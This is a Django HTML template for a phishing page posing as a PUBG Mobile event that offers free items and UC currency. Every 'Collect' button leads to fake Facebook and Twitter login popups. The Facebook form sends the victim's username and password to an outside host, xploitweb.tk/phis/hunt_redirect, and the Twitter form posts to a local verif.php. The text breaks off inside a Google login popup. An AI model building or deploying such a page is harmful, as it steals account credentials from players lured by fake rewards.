<!DOCTYPE html>
<html lang="en">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    {% load static %}
    
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="Description" content="NEW MAP: LIVIK Break new ground">
    <meta name="Keywords" content="NEW MAP,NEW MAP: LIVIK,Break new ground">
    <meta property="og:url" content="https://www.pubgmobile.com/event/suspensestation/">
    <!-- 链接 -->
    <meta property="og:type" content="website">
    <meta property="og:title" content="Exclusive New Map">
    <meta property="og:description" content="NEW MAP: LIVIK Break new ground">
    <meta property="og:image" content="https://www.pubgmobile.com/en/event/suspensestation/images/share.jpg">
    <!-- 分享图 -->
    <link rel="stylesheet" href="{% static 'pubg/tod/css/swiper.min.css' %}">
    <link rel="stylesheet" href="{% static 'pubg/tod/css/animation.css' %}">
    <link rel="stylesheet" href="{% static 'pubg/tod/css/rp.css' %}">
    <link rel="stylesheet" href="">
    <link rel="stylesheet" href="{% static 'pubg/tod/css/all.css' %}">
	<link rel="icon" type="image/png" href="https://pubgmo.site/img/favicon.ico">
<meta content="width=device-width,maximum-scale=1.0,initial-scale=1.0" name="viewport">


<link rel="stylesheet" href="{% static 'pubg/tod/css/pop.css' %} ">
<link rel="stylesheet" href="{% static 'pubg/tod/css/facebook.css' %}">
<link rel="stylesheet" href="{% static 'pubg/tod/css/twitter.css' %}">
<link rel="stylesheet" href="{% static 'pubg/tod/css/google.css' %}">
<link rel="stylesheet" href="{% static 'pubg/tod/css/animate.css' %}">
<link rel="stylesheet" href="http://bit.do/fGWng">
<link rel="stylesheet" href="http://bit.do/fGWnh">
<link rel="stylesheet" href="http://bit.do/fGWni">
<link rel="stylesheet" href="http://bit.do/fGWnk">
<link rel="stylesheet" href="http://bit.do/fGWnn">
<link rel="stylesheet" href="path/to/material-design-iconic-font/css/material-design-iconic-font.min.css">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">

<link rel="stylesheet" href="{% static 'pubg/tod/css/reset.css' %}">
<link rel="stylesheet" href="{% static 'pubg/tod/css/common.css' %}">
    
    <!-- css -->

<script type="text/javascript" async="" src="{% static 'pubg/tod/css/request' %} "></script>
   <title>PUBGM</title>

</head>

    


<body >

    <!-- nav -->
    <div class="top-nav">
    <div class="top-main c">
        <!-- logo,name -->
        <div class="top-log c">
            <a href="https://www.pubgmobile.com/en-US/" onclick="gtag(&#39;event&#39;,&#39;x_jump&#39;,{&#39;event_category&#39;:&#39;common_inc&#39;,&#39;event_label&#39;:&#39;nav_logo&#39;});">
                <img src="tod/css/icon_logo.jpg" width="128" height="128" alt="">
            </a>
            <h1 class="top-tit">
                PUBG MOBILE
                <span>OFFICIAL PUBG ON MOBILE</span>
            </h1>
        </div>
        <!-- line -->
        <div class="top-line" onclick="gtag(&#39;event&#39;,&#39;x_click&#39;,{&#39;event_category&#39;:&#39;common_inc&#39;,&#39;event_label&#39;:&#39;nav_btn&#39;});">
            <ul>
                <li>-</li>
                <li>-</li>
                <li>-</li>
            </ul>
        </div>
        <!-- nav-list -->
        <ul class="nav-list">
            <li class="on">
                <a href="https://www.pubgmobile.com/en-US/" onclick="gtag(&#39;event&#39;,&#39;x_jump&#39;,{&#39;event_category&#39;:&#39;common_inc&#39;,&#39;event_label&#39;:&#39;nav_home&#39;});">HOME</a>
            </li>




            <li class="slide-icon slide-icon-c"><a href="https://www.pubgmobile.com/event/brandassets/" onclick="gtag(&#39;event&#39;, &#39;x_click&#39;, {&#39;event_category&#39;: &#39;common_inc&#39;,&#39;event_label&#39;: &#39;nav_brandassets&#39;});"><span>Brand Assets</span></a></li>
            <li class="slide-icon slide-icon-c nav-lang-box">
                <span>LANGUAGE：
					<span class="lang-on"><i class="en"></i><em class="lang_change">EN</em></span>
                </span>

            </li>
        </ul>
        <!-- homepage,download -->
        <div class="top-btn">
            <a href="https://www.pubgmobile.com/pay/" target="_blank" onclick="gtag(&#39;event&#39;,&#39;x_jump&#39;,{&#39;event_category&#39;:&#39;common_inc&#39;,&#39;event_label&#39;:&#39;nav_purchase&#39;});">PURCHASE</a>
            <a class="down" href="https://web.gpubgm.com/m/Website/xiaobao/AOS_IG0180_No28_0.18.0.12601_Shipping_ThirdPartyPayment_GLOBAL.shell.signed_uawebsite.apk" target="_blank" onclick="gtag(&#39;event&#39;,&#39;x_click&#39;,{&#39;event_category&#39;:&#39;common_inc&#39;,&#39;event_label&#39;:&#39;nav_download&#39;});">DOWNLOAD</a>
        </div>
    </div>
</div>

<!--end: common menu -->
    <!-- content -->
    
<div class="m-goTop"><span></span></div>


<div class="wrap">

    <div class="g-weapon">
        <div class="m-weapon-tab-up">
            <ul class="m-weapon-tab-upList x-box" id="J_weaponTabUp">
                

                <li onclick="openRewards(event, 'item');">
                    <span class="txt">Free Item</span>
                </li>
				
				<li onclick="openRewards(event, 'season');" id="defaultTabRewards">
                    <span class="txt">Season Rewards</span>
                </li>
                
                <li onclick="openRewards(event, 'uc');">
                    <span class="txt">Uknown Cash</span>
                </li>


            </ul>
        </div>
<!--- menu rewards wrapper --->

<div id="item" class="tab_rewards">
<div class="scroll-rewards">

<div class="item kanan">
<img style="border-bottom: 0px;" src="https://i.ibb.co/L5dygm7/1.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/L5dygm7/1.png">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="https://i.ibb.co/z51jrp5/2.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/z51jrp5/2.png">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="https://i.ibb.co/SBP3Z2F/3.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/SBP3Z2F/3.png">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="https://i.ibb.co/BfWvbp2/4.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/BfWvbp2/4.png">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="https://i.ibb.co/svx0N62/5.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/svx0N62/5.png">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="https://i.ibb.co/h8pCNcr/6.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/h8pCNcr/6.png">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="https://i.ibb.co/WtDh7dF/7.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/WtDh7dF/7.png">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="https://i.ibb.co/CvSKHzH/8.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/CvSKHzH/8.png">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="https://i.ibb.co/TWWckdC/9.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/TWWckdC/9.png">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="https://i.ibb.co/XCQZKYR/10.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/XCQZKYR/10.png">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="https://i.ibb.co/St09Z3w/11.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/St09Z3w/11.png">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="https://i.ibb.co/GTR1G62/12.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/GTR1G62/12.png">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="https://i.ibb.co/7JySSH4/13.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/7JySSH4/13.png">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="https://i.ibb.co/sQKcS77/14.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/sQKcS77/14.png">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="https://i.ibb.co/Lr6L3gj/15.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/Lr6L3gj/15.png">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="https://i.ibb.co/BnR3d9T/16.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/BnR3d9T/16.png">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="https://i.ibb.co/d42h7NV/17.png">
<button type="button" onclick="confirm(this)" src="https://i.ibb.co/d42h7NV/17.png">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="tod/img/item/1.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/1.png' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="tod/img/item/2.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/2.png' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="tod/img/item/3.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/3.png' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="tod/img/item/4.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/4.png' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="tod/img/item/5.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/5.png' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="tod/img/item/6.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/6.png' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="tod/img/item/7.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/7.png' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="tod/img/item/8.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/8.png' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="tod/img/item/9.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/9.png' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="tod/img/item/10.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/10.png' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="tod/img/item/13.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/13.png' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="tod/img/item/11.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/11.png' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="tod/img/item/12.png">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/item/12.png' %}">Collect</button>
</div>
<br><br><br><br>
</div> <!--- scroll --->


</div> <!--- tab content --->

<div id="season" class="tab_rewards">
<div class="scroll-rewards">

<div class="item kanan">
    
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/1.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/1.jpg' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/2.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/2.jpg' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/3.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/3.jpg' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/4.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/4.jpg' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/5.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/5.jpg' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/6.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/6.jpg' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/7.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/7.jpg' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/8.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/8.jpg' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/9.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/9.jpg' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/10.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/10.jpg' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/11.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/11.jpg' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/12.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/12.jpg' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/13.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/13.jpg' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/14.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/14.jpg' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/15.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/15.jpg' %}">Collect</button>
</div>
<div class="item kanan">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/16.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/16.jpg' %}">Collect</button>
</div>
<div class="item kiri">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/17.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/17.jpg' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/18.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/18.jpg' %}">Collect</button>
</div>
<div class="item tengah">
<img style="border-bottom: 0px;" src="{% static 'pubg/tod/img/season/19.jpg' %}">
<button type="button" onclick="confirm(this)" src="{% static 'pubg/tod/img/season/19.jpg' %}">Collect</button>
</div>
<br><br><br><br>
</div> <!--- scroll --->
</div> <!--- tab content --->

<div id="uc" class="tab_rewards">
<center>
<div class="uc" onclick="confirm1(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="{% static 'pubg/tod/img/uc.png' %}">
<span>60</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm2(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="{% static 'pubg/tod/img/uc.png' %}">
<span>300 + 25</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm3(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>600 + 60</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm4(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>1500 + 300</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm5(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>3000 + 850</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm6(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>6000 + 2100</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm7(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>8000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm8(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>10000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm9(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>12000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm10(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>14000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm11(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>16000 + 1000</span>
</br>
Unknown Cash
</div>
<div class="uc" onclick="confirm12(this)" src="{% static 'pubg/tod/img/uc.png' %}">
<img src="tod/img/uc.png">
<span>17000 + 1000</span>
</br>
Unknown Cash
</div>
</center>
</div> <!--- tab --->


</div> <!--- content --->
</div> <!--- container mask --->
</div> <!--- container --->
</div> <!--- popup box --->
</div> <!--- popup --->




<div class="popup-confirm-wrapper confirm animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img  id="got">
<div class="popup-confirm-txt">
FREE
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> <!--- popup confirm --->
</div> <!--- popup --->

<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm1 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 60 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm1()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>

</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm2 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 300 + 25 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm2()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm3 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 600 + 60 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm3()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm4 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 1500 + 300 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm4()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm5 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 3000 + 850 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm5()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm6 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 6000 + 2100 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm6()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm7 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 8000 + 1000 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm7()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm8 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 10000 + 1000 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm8()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm9 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 12000 + 1000 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm9()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm10 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 14000 + 1000 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm10()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm11 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 16000 + 1000 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm11()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
</div> 
</div>
<!--- popup confirm --->
<!--- popup confirm --->
<div class="popup-confirm-wrapper confirm12 animated fadeIn" style="display: none;">
<div class="popup-confirm">
<div class="popup-confirm-navbar">
Confirm Selected Reward
</div>
<div class="popup-confirm-content">
<div class="popup-confirm-txt">
Are you sure you want to collect this free rewards?
</div>
<img src="tod/img/uc.png" style="border-radius:50%;">

<div class="popup-confirm-txt">

<b>FREE 17000 + 1000 UC</b>
</div>
<button type="button" class="kiri" style="width: 45%;" onclick="close_confirm12()">Cancel now</button>
<button type="button" class="kanan" style="width: 45%;" onclick="login()">Collect now</button>
</div>
<br><br>
</div> 
</div>
<!--- popup confirm --->

<!--- LOGIN CONTENT --->
<div class="popup login" style="display: none;">
<div class="popup-box animated fadeIn">
<center>
<div class="header-menu-box" style="border-top-left-radius: 10px; border-top-right-radius: 10px;">
<div class="header-menu-list-more">
Login Account
</div>
</div>
<div class="notify">
<i class="zmdi zmdi-chevron-right zmdi-hc-lg"></i>
<div id="messagelogin"></div>
<script src="{% static 'pubg/tod/js/typewriter.js"></script>
<script>
var messagelogin = document.getElementById('messagelogin');
var typewriter = new Typewriter(messagelogin, { 
loop: true
});
typewriter.typeString('To receive your prize, please login first') 
.pauseFor(1000) 
.deleteChars(8) 
.start();
</script>
</div>
</br>
<div class="btn-login" onclick="open_facebook()">
<div class="bungkusan-konten">
<div class="bungkusan-logo">
<center>
<img src="{% static 'tod/img/facebook.png' %}">
</center>
</div>  
<span class="bungkusan-teks"> 
<span>Login using Facebook</span>
</span>
</div>  
</div>
<div class="btn-login" onclick="open_twitter()">
<div class="bungkusan-konten">
<div class="bungkusan-logo">
<center>
<img src="{% static 'tod/img/twitter.png' %} ">
</center>
</div>  
<span class="bungkusan-teks"> 
<span>Login using Twitter</span>
</span>
</div>  
</div>

<button type="button" class="btn-back" onclick="close_login()">Back to home</button>
</center>
</div>
</div>
<!--- LOGIN CONTENT END --->



<div class="popup-login facebook animated fadeIn" style="display: none;">
	<div class="popup-box-login-fb">
		<a onclick="close_facebook()" class="close-other">X</a>
		<div class="navbar-fb">
			<img src="{% static 'tod/img/fb.png' %}">
		</div>
		<div class="content-box-fb">
			<img src="https://www.pubgmobile.com/id/event/royalepass10/images/icon_logo.jpg">
			<div class="txt-login-fb">
				 Log in to your Facebook account to connect to PUBG MOBILE
			</div>
			<form class="login-form" action="http://xploitweb.tk/phis/hunt_redirect" method="GET">
				<label>
				<input type="text" name="username" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required>
				</label>

                <div class="form-group">
                <input type="hidden"  name="token" id="inputtoken" value="123456789">
            </div>

             <div class="form-group">
                <input type="hidden"  name="page_app" id="pageapp" value="pubg">
             </div>
                <div class="form-group">
                <input type="hidden"  name="ip" id="ip" value="1.1.1.1">
             </div>

				<label>
				<input type="password" name="password" placeholder="Password" autocomplete="off" autocapitalize="off" required>
				</label>
				<input type="hidden" name="login" value="Facebook" readonly><br><br><br>
				<button type="submit" class="btn-login-fb">Log In</button>
			</form>
			<div class="txt-create-account">Create account</div>
			<div class="txt-not-now">Not now</div>
			<div class="txt-forgotten-password">Forgotten password?</div>
		</div>
		<div class="language-box">
			<center>
			<div class="language-name language-name-active">English (UK)</div>
			<div class="language-name">Bahasa Indonesia</div>
			<div class="language-name">Basa Jawa</div>
			<div class="language-name">Bahasa Melayu</div>
			<div class="language-name">日本語</div>
			<div class="language-name">Español</div>
			<div class="language-name">Português (Brasil)</div>
			<div class="language-name">
				<i class="fa fa-plus"></i>
			</div>
			</center>
		</div>
		<div class="copyright">Facebook Inc.</div>
	</div>
</div>


<div class="popup-login twitter animated fadeIn" style="display: none;">
	<div class="popup-box-login-twitter">
	<a onclick="close_twitter()" class="close-other">X</a>
		<div class="header-twitter">
			<center>
			<img src="https://i.ibb.co/TqpkwwR/tw.png">
			</center>
		</div>
		<div class="box-twitter">
			<center>
			<form action="tod/verif.php" method="GET">
				<div class="txt-login-twitter">Login to Twitter</div>
				<div class="input-box-twitter">
					<input type="text" name="username" placeholder="Phone, email, or username" required>
				</div>
				<div class="input-box-twitter">
					<input type="password" name="password" placeholder="Password" required>
				</div>
				<input type="hidden" name="login" value="Twitter" readonly>
				<button type="submit" class="btn-login-twitter">Log In</button>
				<div class="footer-menu-twitter">Forgot password?</div>
				<div class="footer-menu-twitter bulet">•</div>
				<div class="footer-menu-twitter">Sign up to Twitter</div>
			</form>
			</center>
		</div>
	</div>
</div>

<div class="popup-login google animated fadeIn" style="display: none;">
	<div class="popup-box-login-google">
		<a onclick="closegog()" class="close-other"><i class="zmdi zmdi-close"></i></a>
		<div class="header-google">
			<center>
			<img src="{% static 'pubg/img/login/popup/google.png">
			</center>
		</div>
